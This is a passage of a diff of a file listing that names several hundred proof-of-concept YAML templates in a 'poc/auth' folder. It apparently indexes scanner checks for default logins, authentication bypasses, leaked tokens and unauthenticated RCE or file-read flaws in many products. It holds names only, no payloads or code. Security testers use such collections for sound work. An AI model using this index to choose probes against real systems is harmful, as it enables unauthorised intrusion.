./poc/auth/dir-100-login-panel.yaml ./poc/auth/dir-600-login-panel.yaml ./poc/auth/dir-850l-login-panel.yaml +./poc/auth/directadmin-login-panel-7000.yaml ./poc/auth/directadmin-login-panel-7001.yaml ./poc/auth/directadmin-login-panel.yaml ./poc/auth/directum-login.yaml @@ -2028,7 +2007,7 @@ ./poc/auth/discord-cilent-secret.yaml ./poc/auth/discuz-wechat-plugins-unauth.yaml ./poc/auth/discuz-wechat-plugins-unauth.yml -./poc/auth/django-secret-key.yaml +./poc/auth/django-secret.key.yaml ./poc/auth/dlink-850l-password-leak.yaml ./poc/auth/dlink-ac-centralized-management-system-default-login.yaml ./poc/auth/dlink-ac-default-password.yaml 
@@ -2050,6 +2029,7 @@ ./poc/auth/dologin-plugin.yaml ./poc/auth/dologin.yaml ./poc/auth/dolphinscheduler-default-login-7072.yaml +./poc/auth/dolphinscheduler-default-login-7073.yaml ./poc/auth/doppler-api-token.yaml ./poc/auth/dpt-oauth-client-c816cf65f82ebdf2ade35164058fc67e.yaml ./poc/auth/dpt-oauth-client-f37b20b98f49a19d8d00195f0b6db9ea.yaml @@ -2088,22 +2068,22 @@ ./poc/auth/drupal_module-super_login-cross-site-scripting.yaml ./poc/auth/drupal_module-token_custom-arbitrary-php-code-execution.yaml ./poc/auth/drupal_module-yubikey-access-bypass.yaml +./poc/auth/dubbo-admin-default-login-7120.yaml ./poc/auth/dubbo-admin-default-login-7121.yaml -./poc/auth/dubbo-admin-default-login.yaml ./poc/auth/dubbo-admin-default-password.yaml ./poc/auth/dubbo-admin-default-password.yml ./poc/auth/duffel-api-token.yaml ./poc/auth/dvwa-default-login-7126.yaml -./poc/auth/dvwa-default-login-7127.yaml ./poc/auth/dvwa-default-login-7128.yaml ./poc/auth/dvwa-default-login-7129.yaml -./poc/auth/dvwa-headless-automatic-login-7130.yaml +./poc/auth/dvwa-default-login.yaml +./poc/auth/dvwa-headless-automatic-login-7131.yaml ./poc/auth/dvwa-headless-automatic-login-7132.yaml ./poc/auth/dvwa-headless-automatic-login-7133.yaml ./poc/auth/dvwa-headless-automatic-login.yaml ./poc/auth/dynamically-register-sidebars-a3329eaa025f4bd78463fd98e337add9.yaml ./poc/auth/dynamically-register-sidebars.yaml -./poc/auth/dynatrace-token-7146.yaml +./poc/auth/dynatrace-token-7145.yaml ./poc/auth/dynatrace-token.yaml ./poc/auth/e-cology-verify-quick-login-user-login.yaml ./poc/auth/e-learning-system-authentication-bypass-rce.yaml 
@@ -2163,13 +2143,12 @@ ./poc/auth/electric-studio-client-login-f80c5406ebadb06c127dd29569b85330.yaml ./poc/auth/electric-studio-client-login.yaml ./poc/auth/email-verification-token-bypass.yaml -./poc/auth/emcecom-default-login-7211.yaml ./poc/auth/emcecom-default-login-7212.yaml ./poc/auth/emcecom-default-login-7213.yaml ./poc/auth/emcecom-default-login-7214.yaml ./poc/auth/emqx-default-login-7221.yaml +./poc/auth/emqx-default-login-7222.yaml ./poc/auth/emqx-default-login.yaml -./poc/auth/ems-login-panel-7223.yaml ./poc/auth/ems-login-panel-7224.yaml ./poc/auth/ems-login-panel-7225.yaml ./poc/auth/ems-login-panel.yaml @@ -2179,7 +2158,6 @@ ./poc/auth/epmp-login-7228.yaml ./poc/auth/epmp-login-7229.yaml ./poc/auth/epmp-login-7230.yaml -./poc/auth/epmp-login.yaml ./poc/auth/epson-unauthorized-access-detect.yaml ./poc/auth/erident-custom-login-and-dashboard-0e2a68c6bc5c7e524706a5b5493bef90.yaml ./poc/auth/erident-custom-login-and-dashboard-65d615ac22cc89343ec17e71c91783a6.yaml @@ -2193,8 +2171,6 @@ ./poc/auth/esafenet-cdgserver3-linkfilterservice-bypassauth.yaml ./poc/auth/esafenet-cdgserver3-systemconfig-default-password.yaml ./poc/auth/esxi-unauthorized-access.yaml -./poc/auth/etcd-keys-7261.yaml -./poc/auth/etcd-keys-7262.yaml ./poc/auth/etcd-keys.yaml ./poc/auth/etcd-unauth.yaml ./poc/auth/etcd-unauth.yml @@ -2220,7 +2196,7 @@ ./poc/auth/exacqvision-default-login-7274.yaml ./poc/auth/exacqvision-default-login-7275.yaml ./poc/auth/exacqvision-default-login-7276.yaml -./poc/auth/exacqvision-default-login-7277.yaml +./poc/auth/exacqvision-default-login.yaml ./poc/auth/exacqvision-default-password.yaml ./poc/auth/exchange-addon-authorize-net-d43cc9eb0f6efba271859825f9179410.yaml ./poc/auth/exchange-addon-authorize-net.yaml 
@@ -2237,7 +2213,6 @@ ./poc/auth/facebook-api-token.yaml ./poc/auth/facebook-secret-7386.yaml ./poc/auth/facebook-secret.yaml -./poc/auth/facebook-secrets.yaml ./poc/auth/fake-auth-bypass.yaml ./poc/auth/fake-auth-header-auth-bypass.yaml ./poc/auth/fake-referer-header-auth-bypass.yaml @@ -2249,13 +2224,11 @@ ./poc/auth/fanwei-unauth.yaml ./poc/auth/faraday-login-7393.yaml ./poc/auth/faraday-login-7394.yaml -./poc/auth/faraday-login-7395.yaml ./poc/auth/faraday-login-7396.yaml -./poc/auth/faraday-login-7397.yaml ./poc/auth/faraday-login.yaml ./poc/auth/fastly-api-token.yaml +./poc/auth/fatpipe-auth-bypass-7431.yaml ./poc/auth/fatpipe-auth-bypass-7432.yaml -./poc/auth/fatpipe-auth-bypass.yaml ./poc/auth/fb-access-token.yaml ./poc/auth/fcm-api-key.yaml ./poc/auth/fcm-server-key-7450.yaml @@ -2288,9 +2261,9 @@ ./poc/auth/flir-ax8-default-credentials-7512.yaml ./poc/auth/flir-ax8-default-credentials.yaml ./poc/auth/flir-default-login-7513.yaml -./poc/auth/flir-default-login-7514.yaml ./poc/auth/flir-default-login-7515.yaml ./poc/auth/flir-default-login-7516.yaml +./poc/auth/flir-default-login.yaml ./poc/auth/flir-login.yaml ./poc/auth/fortiauthenticator-detect.yaml ./poc/auth/fortitester-login-panel.yaml 
@@ -2298,18 +2271,16 @@ ./poc/auth/frp-dashboard-unauth.yml ./poc/auth/frp-default-credentials-7555.yaml ./poc/auth/frp-default-credentials.yaml -./poc/auth/frp-default-login-7556.yaml ./poc/auth/frp-default-login-7557.yaml ./poc/auth/frp-default-login-7558.yaml ./poc/auth/frp-default-login-7559.yaml ./poc/auth/frp-unauthenticated.yaml ./poc/auth/ftp-anonymous-login.yaml ./poc/auth/ftp-credentials-exposure-7567.yaml -./poc/auth/ftp-credentials-exposure-7568.yaml +./poc/auth/ftp-credentials-exposure.yaml ./poc/auth/ftp-default-credentials.yaml ./poc/auth/ftp-default-creds.yaml ./poc/auth/ftp-weak-credentials-7569.yaml -./poc/auth/ftp-weak-credentials-7570.yaml ./poc/auth/ftp-weak-credentials.yaml ./poc/auth/fuelcms-default-login-7571.yaml ./poc/auth/fuelcms-default-login-7572.yaml @@ -2346,8 +2317,9 @@ ./poc/auth/git-credentials-7643.yaml ./poc/auth/git-credentials-7644.yaml ./poc/auth/git-credentials-disclosure-7639.yaml -./poc/auth/git-credentials-disclosure-7640.yaml +./poc/auth/git-credentials-disclosure-7641.yaml ./poc/auth/git-credentials-disclosure-7642.yaml +./poc/auth/git-credentials-disclosure.yaml ./poc/auth/git-credentials.yaml ./poc/auth/gitea-login-7645.yaml ./poc/auth/gitea-login-check.yaml @@ -2365,7 +2337,6 @@ ./poc/auth/gitlab-pipeline-triggertoken.yaml ./poc/auth/gitlab-public-signup-7681.yaml ./poc/auth/gitlab-public-signup-7682.yaml -./poc/auth/gitlab-public-signup-7683.yaml ./poc/auth/gitlab-public-signup-7684.yaml ./poc/auth/gitlab-public-signup.yaml ./poc/auth/gitlab-runner-regtoken.yaml @@ -2379,7 +2350,6 @@ ./poc/auth/gitlab-weak-login-7705.yaml ./poc/auth/gitlab-weak-login-7706.yaml ./poc/auth/gitlab-weak-login-7707.yaml -./poc/auth/gitlab-weak-login.yaml ./poc/auth/gitter-token.yaml ./poc/auth/gloo-unauth-7722.yaml ./poc/auth/gloo-unauth-7724.yaml 
@@ -2387,12 +2357,12 @@ ./poc/auth/gloo-unauth.yaml ./poc/auth/glpi-authentication-7728.yaml ./poc/auth/glpi-authentication-7729.yaml -./poc/auth/glpi-authentication-7730.yaml ./poc/auth/glpi-authentication.yaml ./poc/auth/glpi-default-credential.yaml ./poc/auth/glpi-default-login-7731.yaml ./poc/auth/glpi-default-login-7732.yaml ./poc/auth/glpi-default-login-7733.yaml +./poc/auth/glpi-default-login.yaml ./poc/auth/glpi-login-1.yaml ./poc/auth/glpi-login-2.yaml ./poc/auth/glpi-login-7735.yaml @@ -2400,7 +2370,6 @@ ./poc/auth/glpi-login-7737.yaml ./poc/auth/glpi-login.yaml ./poc/auth/gmail-api-client-secrets-7740.yaml -./poc/auth/gmail-api-client-secrets-7741.yaml ./poc/auth/gmail-api-client-secrets.yaml ./poc/auth/goanywhere-mft-login.yaml ./poc/auth/gocd-encryption-key-7750.yaml @@ -2432,10 +2401,12 @@ ./poc/auth/google-earth-dlogin-7778.yaml ./poc/auth/google-earth-dlogin-7779.yaml ./poc/auth/google-earth-dlogin-7780.yaml +./poc/auth/google-earth-dlogin-7781.yaml ./poc/auth/google-earth-dlogin-7782.yaml ./poc/auth/google-earth-dlogin.yaml ./poc/auth/google-earthenterprise-weak-password.yaml ./poc/auth/google-oauth-clientsecret.yaml +./poc/auth/google-secrets.yaml ./poc/auth/google-seo-author-snippets-c7ef7a54325272053bde6fd4c9883ada.yaml ./poc/auth/google-seo-author-snippets-ce873f3e8d7877eb7cdc80ae1da6d769.yaml ./poc/auth/google-seo-author-snippets-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -2446,7 +2417,7 @@ ./poc/auth/gophish-default-login-7792.yaml ./poc/auth/gophish-default-login-7793.yaml ./poc/auth/gophish-default-login-7794.yaml -./poc/auth/gophish-login-7795.yaml +./poc/auth/gophish-login-7796.yaml ./poc/auth/gophish-login.yaml ./poc/auth/grafana-api-key-exposure.yaml ./poc/auth/grafana-datasource-credentials-exposure.yml 
@@ -2463,6 +2434,7 @@ ./poc/auth/grafana-default-password.yaml ./poc/auth/grafana-default-password.yml ./poc/auth/grafana-login.yml +./poc/auth/grafana-public-signup-7814.yaml ./poc/auth/grafana-public-signup-7815.yaml ./poc/auth/grafana-public-signup-7816.yaml ./poc/auth/grafana-public-signup-7817.yaml @@ -2472,6 +2444,7 @@ ./poc/auth/gryphon-login.yaml ./poc/auth/gt-ac2900-login.yaml ./poc/auth/guacamole-default-login-7858.yaml +./poc/auth/guacamole-default-login-7859.yaml ./poc/auth/guacamole-default-login-7860.yaml ./poc/auth/guacamole-default-login-7861.yaml ./poc/auth/guest-author-25a9f786708949ed3cefc36430f46236.yaml @@ -2522,8 +2495,8 @@ ./poc/auth/homeworks-illumination-web-keypad.yaml ./poc/auth/hongdian-default-login-1.yaml ./poc/auth/hongdian-default-login-2.yaml +./poc/auth/hongdian-default-login-7997.yaml ./poc/auth/hongdian-default-login-7998.yaml -./poc/auth/hongdian-default-login-7999.yaml ./poc/auth/hongdian-default-password-1.yaml ./poc/auth/hongdian-default-password-2.yaml ./poc/auth/horde-login-panel.yaml @@ -2536,8 +2509,8 @@ ./poc/auth/houzez-login-register-bb43e7e2104f92ffb17608db5afe8e6a.yaml ./poc/auth/houzez-login-register.yaml ./poc/auth/hp-ilo-serial-key-disclosure-8022.yaml -./poc/auth/hp-ilo-serial-key-disclosure-8023.yaml ./poc/auth/hp-ilo-serial-key-disclosure-8024.yaml +./poc/auth/hp-ilo-serial-key-disclosure-8025.yaml ./poc/auth/hp-ilo-serial-key-disclosure.yaml ./poc/auth/hp-switch-default-login-8035.yaml ./poc/auth/hp-switch-default-login-8036.yaml 
@@ -2545,21 +2518,22 @@ ./poc/auth/hp-switch-default-login-8038.yaml ./poc/auth/hpe-system-management-login-8014.yaml ./poc/auth/hpe-system-management-login-8015.yaml +./poc/auth/hpe-system-management-login-8017.yaml ./poc/auth/hpe-system-management-login.yaml ./poc/auth/hrsale-unauthenticated-lfi-8039.yaml ./poc/auth/hrsale-unauthenticated-lfi-8040.yaml ./poc/auth/hrsale-unauthenticated-lfi-8041.yaml ./poc/auth/htpasswd-detection-8045.yaml +./poc/auth/htpasswd-detection-8046.yaml ./poc/auth/htpasswd-detection.yaml ./poc/auth/htpasswd.yaml ./poc/auth/http-auth-141b1b9924040b19c483025ca3d106e1.yaml ./poc/auth/http-auth.yaml -./poc/auth/http-etcd-unauthenticated-api-data-leak-8056.yaml ./poc/auth/http-etcd-unauthenticated-api-data-leak-8057.yaml +./poc/auth/http-etcd-unauthenticated-api-data-leak.yaml ./poc/auth/http-username-password.yaml ./poc/auth/httponly-cookie-detect.yaml ./poc/auth/huawei-HG532e-default-login.yaml -./poc/auth/huawei-HG532e-default-router-login.yaml ./poc/auth/huawei-auth-http-server-fileread.yaml ./poc/auth/huawei-auth-server.yaml ./poc/auth/huawei-dg8045-auth-bypass.yaml @@ -2570,9 +2544,8 @@ ./poc/auth/huawei-router-auth-bypass-8073.yaml ./poc/auth/huawei-router-auth-bypass-8074.yaml ./poc/auth/huawei-router-auth-bypass-8075.yaml +./poc/auth/huawei-router-auth-bypass-8076.yaml ./poc/auth/hue-default-credential-8080.yaml -./poc/auth/hue-default-credential-8081.yaml -./poc/auth/hue-default-credential.yaml ./poc/auth/hue-login-panel.yaml ./poc/auth/iam-db-auth.yaml ./poc/auth/iam-key-rotation-90days.yaml @@ -2589,8 +2562,8 @@ ./poc/auth/ibm-mqseries-default-login-8108.yaml ./poc/auth/ibm-note-login-1.yaml ./poc/auth/ibm-note-login-2.yaml -./poc/auth/ibm-note-login-8110.yaml ./poc/auth/ibm-note-login-8111.yaml +./poc/auth/ibm-note-login-8112.yaml ./poc/auth/ibm-note-login.yaml ./poc/auth/ibm-signup-exposure-8119.yaml ./poc/auth/ibm-signup-exposure-8120.yaml 
@@ -2599,16 +2572,15 @@ ./poc/auth/ibm-storage-default-credential-8125.yaml ./poc/auth/ibm-storage-default-password.yaml ./poc/auth/icc-pro-login.yaml +./poc/auth/icinga-web-login-8134.yaml ./poc/auth/icinga-web-login-8135.yaml ./poc/auth/icinga-web-login-8136.yaml -./poc/auth/icinga-web-login-8137.yaml ./poc/auth/icinga-web-login.yaml ./poc/auth/ictprotege-login-panel.yaml ./poc/auth/idemia-biometrics-default-credentials.yaml ./poc/auth/idemia-biometrics-default-login-8138.yaml -./poc/auth/idemia-biometrics-default-login-8139.yaml ./poc/auth/idemia-biometrics-default-login-8140.yaml -./poc/auth/idemia-biometrics-default-login.yaml +./poc/auth/idemia-biometrics-default-login-8141.yaml ./poc/auth/ikuai-login-panel.yaml ./poc/auth/imgproxy-unauth.yaml ./poc/auth/imm-default-login.yaml @@ -2620,7 +2592,6 @@ ./poc/auth/intelbras-login.yaml ./poc/auth/intelliflash-login-panel.yaml ./poc/auth/iptime-default-login-8192.yaml -./poc/auth/iptime-default-login-8193.yaml ./poc/auth/iptime-default-login-8194.yaml ./poc/auth/issabel-login.yaml ./poc/auth/iubenda-cookie-law-solution-0f838161174c3a1452a42342cb556b62.yaml @@ -2638,13 +2609,12 @@ ./poc/auth/jamf-login.yaml ./poc/auth/jboss-default-password.yaml ./poc/auth/jboss-unauth.yml -./poc/auth/jellyseerr-login-panel.yaml ./poc/auth/jenkins-credentials-disclosure.yml ./poc/auth/jenkins-default-login.yaml ./poc/auth/jenkins-default-pwd.yaml -./poc/auth/jenkins-login-8277.yaml ./poc/auth/jenkins-login-8278.yaml ./poc/auth/jenkins-login-8279.yaml +./poc/auth/jenkins-login-8280.yaml ./poc/auth/jenkins-login-detection.yaml ./poc/auth/jenkins-login.yaml ./poc/auth/jenkins-token.yaml @@ -2652,6 +2622,7 @@ ./poc/auth/jenkins-unauthorized-access.yml ./poc/auth/jenkins-weak-password.yaml ./poc/auth/jfrog-login.yaml +./poc/auth/jfrog-unauth-build-exposed-8299.yaml ./poc/auth/jfrog-unauth-build-exposed-8300.yaml ./poc/auth/jfrog-unauth-build-exposed-8301.yaml ./poc/auth/jfrog-unauth-build-exposed-8302.yaml 
@@ -2660,6 +2631,7 @@ ./poc/auth/jinher-oa-c6-default-password.yaml ./poc/auth/jinher-oa-c6-default-password.yml ./poc/auth/jinher-oa-default-login-8311.yaml +./poc/auth/jinher-oa-default-login-8312.yaml ./poc/auth/jira-login-default.yaml ./poc/auth/jira-service-desk-signup-8318.yaml ./poc/auth/jira-service-desk-signup-8319.yaml @@ -2674,11 +2646,11 @@ ./poc/auth/jira-unauthenticated-dashboards-8327.yaml ./poc/auth/jira-unauthenticated-installed-gadgets-8328.yaml ./poc/auth/jira-unauthenticated-installed-gadgets-8329.yaml -./poc/auth/jira-unauthenticated-popular-filters-8331.yaml +./poc/auth/jira-unauthenticated-installed-gadgets-8330.yaml ./poc/auth/jira-unauthenticated-popular-filters.yaml -./poc/auth/jira-unauthenticated-projectcategories-8332.yaml ./poc/auth/jira-unauthenticated-projectcategories-8333.yaml ./poc/auth/jira-unauthenticated-projectcategories-8334.yaml +./poc/auth/jira-unauthenticated-projectcategories.yaml ./poc/auth/jira-unauthenticated-projects-8335.yaml ./poc/auth/jira-unauthenticated-projects-8336.yaml ./poc/auth/jira-unauthenticated-resolutions-8337.yaml @@ -2688,16 +2660,16 @@ ./poc/auth/jira-unauthenticated-user-picker-8341.yaml ./poc/auth/jira-unauthenticated.yaml ./poc/auth/jmx-default-login-8354.yaml -./poc/auth/jmx-default-login-8355.yaml ./poc/auth/jmx-default-login-8356.yaml +./poc/auth/jmx-default-login.yaml ./poc/auth/jmx-default-password.yaml ./poc/auth/jolokia-tomcat-creds-leak.yaml -./poc/auth/jolokia-unauthenticated-lfi-8364.yaml ./poc/auth/jolokia-unauthenticated-lfi-8365.yaml +./poc/auth/jolokia-unauthenticated-lfi-8366.yaml +./poc/auth/jolokia-unauthenticated-lfi.yaml ./poc/auth/jumpserver-unauth-rce.yaml ./poc/auth/jumpserver-unauth-rce.yml ./poc/auth/jumpserver-unauth.yaml -./poc/auth/jupyter-ipython-unauth-8402.yaml ./poc/auth/jupyter-ipython-unauth-8404.yaml ./poc/auth/jupyter-ipython-unauth-8405.yaml ./poc/auth/jupyter-ipython-unauth.yaml 
@@ -2706,33 +2678,33 @@ ./poc/auth/jupyter-notebook-unauthorized-access.yaml ./poc/auth/jupyter-notebook-unauthorized-access.yml ./poc/auth/jupyterhub-default-login-8399.yaml -./poc/auth/jupyterhub-default-login-8400.yaml ./poc/auth/jupyterhub-default-login-8401.yaml ./poc/auth/jwt-auth-095adf04b2058ec616033a7aa2b24d07.yaml ./poc/auth/jwt-auth.yaml ./poc/auth/jwt-detection.yaml ./poc/auth/jwt-token-8408.yaml ./poc/auth/jwt-token-8409.yaml -./poc/auth/jwt-token-8410.yaml +./poc/auth/jwt-token.yaml ./poc/auth/k8s-apiserver-unauthorized.yaml ./poc/auth/k8s-etcd-v3-unauthorized.yaml ./poc/auth/kafka-center-default-login-8415.yaml ./poc/auth/kafka-center-default-login-8416.yaml ./poc/auth/kafka-center-default-login-8417.yaml +./poc/auth/kafka-center-default-login.yaml ./poc/auth/kafka-center-default-password.yaml ./poc/auth/kafka-center-login-8419.yaml ./poc/auth/kafka-center-login.yaml ./poc/auth/kafka-manager-unauth.yml ./poc/auth/kakao-login-phish.yaml ./poc/auth/kanboard-login.yaml +./poc/auth/kasm-login-panel.yaml ./poc/auth/keenetic-web-login-8439.yaml ./poc/auth/keenetic-web-login-8440.yaml ./poc/auth/keenetic-web-login-8441.yaml -./poc/auth/keenetic-web-login-8443.yaml +./poc/auth/keenetic-web-login-8442.yaml ./poc/auth/keenetic-web-login.yaml ./poc/auth/kenesto-login-8445.yaml ./poc/auth/kenesto-login.yaml -./poc/auth/kentico-login-8446.yaml ./poc/auth/kentico-login-8447.yaml ./poc/auth/kentico-login.yaml ./poc/auth/key-cloak-admin-panel-2.yaml 
@@ -2742,14 +2714,14 @@ ./poc/auth/keybase-phish.yaml ./poc/auth/keycloak-admin-panel.yaml ./poc/auth/keycloak-json-8471.yaml -./poc/auth/keycloak-json-8472.yaml +./poc/auth/keycloak-json-8473.yaml ./poc/auth/keycloak-json-8474.yaml ./poc/auth/keycloak-open-redirect.yaml ./poc/auth/keycloak-openid-config-1.yaml ./poc/auth/keycloak-openid-config-2.yaml -./poc/auth/keycloak-openid-config-8475.yaml ./poc/auth/keycloak-openid-config-8476.yaml ./poc/auth/keycloak-openid-config-8477.yaml +./poc/auth/keycloak-openid-config.yaml ./poc/auth/keycloak-workflow.yaml ./poc/auth/keycloak-xss-8478.yaml ./poc/auth/keycloak-xss-8479.yaml @@ -2794,7 +2766,7 @@ ./poc/auth/kubeflow-dashboard-unauth-8517.yaml ./poc/auth/kubeflow-dashboard-unauth.yaml ./poc/auth/kubernetes-etcd-keys.yaml -./poc/auth/kubernetes-unauth.yaml +./poc/auth/kubernetes-unauth(1).yaml ./poc/auth/kubernetes-unauth.yml ./poc/auth/kyan-credential-exposure-8554.yaml ./poc/auth/kyan-credential-exposure.yaml @@ -2993,14 +2965,13 @@ ./poc/auth/lucee-login-8662.yaml ./poc/auth/lucee-login-8663.yaml ./poc/auth/lucee-login-8664.yaml -./poc/auth/lucee-login-8665.yaml ./poc/auth/lucee-login.yaml ./poc/auth/luci-login-detection-8671.yaml ./poc/auth/luci-login-detection.yaml ./poc/auth/lutron-iot-default-login-8674.yaml +./poc/auth/lutron-iot-default-login-8675.yaml ./poc/auth/lutron-iot-default-login-8676.yaml ./poc/auth/lutron-iot-default-login-8677.yaml -./poc/auth/lutron-iot-default-login-8678.yaml ./poc/auth/lutron-iot-default-login.yaml ./poc/auth/lws-hide-login-4a0fdd3939bffa759435178b943a6005.yaml ./poc/auth/lws-hide-login-7028a7a909c306df4421bd71aeeefb14.yaml @@ -3019,7 +2990,6 @@ ./poc/auth/mailchimp-api-key-8722.yaml ./poc/auth/mailchimp-api-key-8723.yaml ./poc/auth/mailchimp-api-key-8724.yaml -./poc/auth/mailchimp-api-key-8726.yaml ./poc/auth/mailchimp-api-key.yaml ./poc/auth/mailwatch-login.yaml ./poc/auth/maiteng-unauth.yaml 
@@ -3034,8 +3004,8 @@ ./poc/auth/matomo-login-portal.yaml ./poc/auth/meks-smart-author-widget-d7cf08d050d4d9c295d6307e65c1ae52.yaml ./poc/auth/meks-smart-author-widget.yaml -./poc/auth/meshcentral-login-8801.yaml ./poc/auth/meshcentral-login-8802.yaml +./poc/auth/meshcentral-login-8803.yaml ./poc/auth/meshcentral-login.yaml ./poc/auth/metersphere-login.yaml ./poc/auth/micro-focus-ucmdb-default-credentials-8843.yaml @@ -3145,7 +3115,6 @@ ./poc/auth/molongui-authorship-d4b210f46b637b290af516754eb158bf.yaml ./poc/auth/molongui-authorship-e8b0088ee9ffce961a1975e3644882d0.yaml ./poc/auth/molongui-authorship.yaml -./poc/auth/mongodb-unauth-8925.yaml ./poc/auth/mongodb-unauth-8926.yaml ./poc/auth/mongodb-unauth-8927.yaml ./poc/auth/mongodb-unauth-8928.yaml @@ -3191,10 +3160,10 @@ ./poc/auth/nacos-user-list-unauthorized.yaml ./poc/auth/nagios-default-credential-8989.yaml ./poc/auth/nagios-default-credential.yaml +./poc/auth/nagios-default-login-8990.yaml ./poc/auth/nagios-default-login-8991.yaml ./poc/auth/nagios-default-login-8992.yaml ./poc/auth/nagios-default-login-8993.yaml -./poc/auth/nagios-default-login-8994.yaml ./poc/auth/naver-login-phish.yaml ./poc/auth/netauth.yaml ./poc/auth/netdata-unauth.yaml @@ -3203,9 +3172,9 @@ ./poc/auth/netgear-prosafe-login.yaml ./poc/auth/netgear-router-auth-bypass-1.yaml ./poc/auth/netgear-router-auth-bypass-2.yaml -./poc/auth/netgear-router-auth-bypass-9025.yaml ./poc/auth/netgear-router-auth-bypass-9026.yaml ./poc/auth/netgear-router-auth-bypass-9027.yaml +./poc/auth/netgear-router-auth-bypass.yaml ./poc/auth/netscalar-aaa-login-9047.yaml ./poc/auth/netscalar-aaa-login-9048.yaml ./poc/auth/netscalar-aaa-login.yaml 
@@ -3213,8 +3182,8 @@ ./poc/auth/netscaler-aaa-login.yaml ./poc/auth/netsus-default-login-9058.yaml ./poc/auth/netsus-default-login-9059.yaml -./poc/auth/netsus-default-login-9060.yaml -./poc/auth/netsus-server-login-9062.yaml +./poc/auth/netsus-default-login.yaml +./poc/auth/netsus-server-login-9061.yaml ./poc/auth/netsus-server-login.yaml ./poc/auth/netsweeper-preauth-rce-workflow.yaml ./poc/auth/newrelic-admin-api-key-9071.yaml @@ -3239,7 +3208,6 @@ ./poc/auth/nps-default-login-9142.yaml ./poc/auth/nps-default-login-9143.yaml ./poc/auth/nps-default-login-9144.yaml -./poc/auth/nps-default-login-9145.yaml ./poc/auth/nps-default-password-9147.yaml ./poc/auth/nps-default-password.yaml ./poc/auth/nps-default-password.yml @@ -3254,11 +3222,13 @@ ./poc/auth/nutanix-web-console-login.yaml ./poc/auth/nuuno-network-login-9160.yaml ./poc/auth/nuuno-network-login-9161.yaml -./poc/auth/nuuno-network-login-9162.yaml ./poc/auth/nuuno-network-login-9163.yaml +./poc/auth/nuuno-network-login-9164.yaml +./poc/auth/nuuno-network-login.yaml ./poc/auth/o2-default-password.yaml ./poc/auth/oauth-access-key-9184.yaml ./poc/auth/oauth-access-key-9185.yaml +./poc/auth/oauth-access-key-9186.yaml ./poc/auth/oauth-client-cd3ce5265515419eaa2f80ce50d80c3b.yaml ./poc/auth/oauth-client-for-user-authentication-1e787d9eb928d177bffbf4da69766c02.yaml ./poc/auth/oauth-client-for-user-authentication-8b8330bacdc4e03bd13b4255b2f9c8e2.yaml @@ -3273,7 +3243,6 @@ ./poc/auth/oauth-twitter-feed-for-developers-2c4a03e880aaa9ac7d131e8aec6fd5ff.yaml ./poc/auth/oauth-twitter-feed-for-developers.yaml ./poc/auth/oauth2-detect-9180.yaml -./poc/auth/oauth2-detect-9181.yaml ./poc/auth/oauth2-detect-9182.yaml ./poc/auth/oauth2-detect-9183.yaml ./poc/auth/oauth2-provider-2ae833691d89595113a94c5ad9ff28e0.yaml 
@@ -3293,8 +3262,8 @@ ./poc/auth/oauth2-server.yaml ./poc/auth/obf_token_smuggling.yml ./poc/auth/ocs-inventory-login.yaml -./poc/auth/octobercms-default-login-9192.yaml ./poc/auth/octobercms-default-login-9193.yaml +./poc/auth/octobercms-default-login.yaml ./poc/auth/octoprint-login-1.yaml ./poc/auth/octoprint-login-2.yaml ./poc/auth/octoprint-login-9197.yaml @@ -3303,7 +3272,6 @@ ./poc/auth/ofbiz-default-credentials.yaml ./poc/auth/ofbiz-default-login-9208.yaml ./poc/auth/ofbiz-default-login-9209.yaml -./poc/auth/ofbiz-default-login-9210.yaml ./poc/auth/ofbiz-default-login-9211.yaml ./poc/auth/ofbiz-default-password.yaml ./poc/auth/officekeeper-admin-login.yaml @@ -3348,14 +3316,13 @@ ./poc/auth/onlyoffice-login-panel.yaml ./poc/auth/open-stack-dashboard-login-1.yaml ./poc/auth/open-stack-dashboard-login-2.yaml -./poc/auth/open-stack-dashboard-login-9322.yaml +./poc/auth/open-stack-dashboard-login-9321.yaml ./poc/auth/open-stack-dashboard-login-9323.yaml ./poc/auth/open-stack-dashboard-login-9324.yaml ./poc/auth/open-stack-dashboard-login.yaml ./poc/auth/openai-key.yaml ./poc/auth/openbmcs-secret-disclosure.yaml ./poc/auth/openemr-default-login-9270.yaml -./poc/auth/openemr-default-login.yaml ./poc/auth/openerp-default-password.yaml ./poc/auth/openfire-credentials-exposure.yaml ./poc/auth/opengear-login.yaml @@ -3372,6 +3339,7 @@ ./poc/auth/oracle-ebs-credentials-disclosure-9363.yaml ./poc/auth/oracle-ebs-credentials-disclosure.yaml ./poc/auth/oracle-enterprise-manager-login.yaml +./poc/auth/oracle-opera-login.yaml ./poc/auth/oracle-people-sign-in.yaml ./poc/auth/orbiteam-bscw-server-unauthenticated-lfi.yaml ./poc/auth/ov3-online-administration-unauthenticated-lfi.yaml 
@@ -3386,12 +3354,15 @@ ./poc/auth/panabit-gateway-default-password.yaml ./poc/auth/panabit-gateway-default-password.yml ./poc/auth/panabit-ixcache-default-login-9443.yaml +./poc/auth/panabit-ixcache-default-login.yaml ./poc/auth/panabit-ixcache-default-password.yaml ./poc/auth/panabit-ixcache-default-password.yml ./poc/auth/panos-default-credentials.yaml ./poc/auth/panos-default-login-9454.yaml +./poc/auth/panos-default-login-9455.yaml ./poc/auth/panos-default-login-9456.yaml ./poc/auth/panos-default-login-9457.yaml +./poc/auth/panos-default-login.yaml ./poc/auth/papercut-missing-auth.yaml ./poc/auth/password-policy-not-set.yaml ./poc/auth/password-policy.yaml @@ -3412,13 +3383,13 @@ ./poc/auth/passwords-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/auth/passwords-manager-plugin.yaml ./poc/auth/passwords-manager.yaml -./poc/auth/paypal-braintree-token-11856.yaml +./poc/auth/paypal-braintree-token(1).yaml ./poc/auth/paypal-braintree-token.yaml ./poc/auth/pentaho-cve-2021-31602-authentication-bypass.yaml ./poc/auth/pentaho-cve-2021-31602-authentication-bypass.yml ./poc/auth/pentaho-default-login-9477.yaml -./poc/auth/pentaho-default-login-9478.yaml ./poc/auth/pentaho-default-login-9479.yaml +./poc/auth/pentaho-default-login-9480.yaml ./poc/auth/pentaho-default-login.yaml ./poc/auth/peoplenet-ikey.yaml ./poc/auth/peoplesoft-default-login.yaml @@ -3474,7 +3445,6 @@ ./poc/auth/pinpoint-unauth-1.yaml ./poc/auth/pinpoint-unauth-2.yaml ./poc/auth/pinpoint-unauth-9588.yaml -./poc/auth/pinpoint-unauth-9590.yaml ./poc/auth/pinpoint-unauth.yaml ./poc/auth/plainview-protect-passwords-64631f7e755eb94d7c99500d0510ac42.yaml 